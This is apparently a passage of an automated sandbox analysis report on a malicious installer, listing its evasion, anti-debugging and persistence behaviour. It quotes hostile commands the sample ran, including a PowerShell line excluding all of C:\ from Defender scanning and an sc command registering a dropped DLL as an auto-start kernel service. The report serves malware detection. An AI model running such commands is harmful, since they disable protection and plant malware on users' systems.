Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSystem information queried: FirmwareTableInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5440Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4219Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpWindow / User API: threadDelayed 549Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpWindow / User API: threadDelayed 572Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpWindow / User API: threadDelayed 527Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-P0N7P.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\hrsw.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\trash (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\is-R44JL.tmpJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\tProtect.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-D4O0V.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-P0N7P.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-D4O0V.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeAPI coverage: 7.4 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1408Thread sleep time: -11990383647911201s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CC0AEC0 FindFirstFileA,FindClose,6_2_6CC0AEC0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00F06868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,11_2_00F06868
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00F07496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,11_2_00F07496
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00F09C60 GetSystemInfo,11_2_00F09C60
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000002.2167704241.0000000000CBC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\}7
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000002.2167704241.0000000000CBC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}p6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CA93886 NtSetInformationThread 00000000,00000011,00000000,000000006_2_6CA93886
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpProcess queried: DebugPortJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CC20181 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_6CC20181
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00F857D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,11_2_00F857D0
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CC29D66 mov eax, dword ptr fs:[00000030h]6_2_6CC29D66
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CC29D35 mov eax, dword ptr fs:[00000030h]6_2_6CC29D35
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CC1F17D mov eax, dword ptr fs:[00000030h]6_2_6CC1F17D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CC18CBD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_6CC18CBD
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CC20181 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_6CC20181

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
Source: tProtect.dll.13.drStatic PE information: Found potential injection code
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= autoJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoarJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoarJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CCE7700 cpuid 6_2_6CCE7700
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
